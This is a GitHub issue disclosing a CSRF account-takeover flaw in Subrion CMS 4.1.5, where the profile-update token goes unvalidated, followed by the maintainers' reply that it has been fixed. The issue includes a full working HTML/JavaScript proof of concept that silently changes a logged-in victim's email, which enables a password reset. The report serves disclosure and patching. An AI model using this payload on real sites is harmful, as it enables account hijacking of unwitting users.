Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSRF Account Take Over Possible #570

Closed
9emin1 opened this issue Oct 15, 2017 · 2 comments
Closed

CSRF Account Take Over Possible #570

9emin1 opened this issue Oct 15, 2017 · 2 comments
Labels
Milestone

Comments

@9emin1
Copy link

9emin1 commented Oct 15, 2017

Affected Software

Subrion Open Source CMS
https://subrion.org
https://github.com/intelliants/subrion

Version Tested
4.1.5 - Latest Stable version June 26, 2017
https://subrion.org/download/

Environment Tested
Ubuntu 16.04
PHP 7.0



Vulnerability and Impact

Vulnerability:
Cross-Site Request Forgery CSRF attack on profile update

Impact:
Account Take Over
The changing of password requires the knowledge of the current password, this
prevents simplified account take over.

It is still possible to perform an account take over through CSRF attack as
it is possible to change the email of the user without knowing
the current password.

By changing the email, the attacker is able to perform a account reset :)



Vulnerability Description:

It is discovered that state changing requests, such as updating of profile:

POST /profile/

contains a parameter __st that holds a unqiue value to act as a CSRF prevention

However this value is not validated on the server side and thus it is possible
to perform a CSRF attack.



Steps to Reproduce:

Craft a .html file that contains the CSRF attack POST request.
Please change the http://172.16.6.167 to your own hosted IP address.
The value of fullname does not matter. The important parameter here is email.
Please note that for demonstration purpose, clicking on "Submit request" is
required. A real attack does not require a victim to click on any buttons, as
it is possible to auto submit POST request when a page is loaded

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/172.16.6.167\/profile\/", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------426022850688199453496807880");
        xhr.withCredentials = true;
        var body = "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"__st\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"fullname\"\r\n" + 
          "\r\n" + 
          "HackedBy9emin1\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"email\"\r\n" + 
          "\r\n" + 
          "sec.9emin1@gmail.com\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"avatar[title]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"avatar[path]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"avatar[file]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"avatar[size]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"website\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"phone\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"biography\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"facebook\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"twitter\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"gplus\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"linkedin\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"change_info\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"current\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"new\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880\r\n" + 
          "Content-Disposition: form-data; name=\"confirm\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------426022850688199453496807880--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
  1. Authenticate into Subrion CMS. Browse to your profile page.
  2. On another tab, visit this crafted .html and click Submit Request
  3. Refresh your profile page and your email will be hijacked

Refer to the screenshot attached. The entire __st is removed and the state-
changing request to update the profile still works.
csrf-attack


Recommendation:

Validate the CSRF token
Consider implementing changing of email to require the current password

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)



@vbezruchkin vbezruchkin added this to the 4.2.0 milestone Oct 16, 2017
@vbezruchkin vbezruchkin assigned ghost Oct 16, 2017
@ghost
Copy link

ghost commented Oct 16, 2017

Hello @9emin1,

Many thanks for your report.

We had several requests on this issue and have already fixed it. Please refer to the following commit: 5fdf03a

Appreciate your efforts!

@ghost ghost closed this as completed Oct 16, 2017
@vbezruchkin
Copy link
Member

Just a minor addition to the issue:
We will release a new version this week

Appropriate auto patch will be released for 4.1.x version.

Thanks

This issue was closed.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants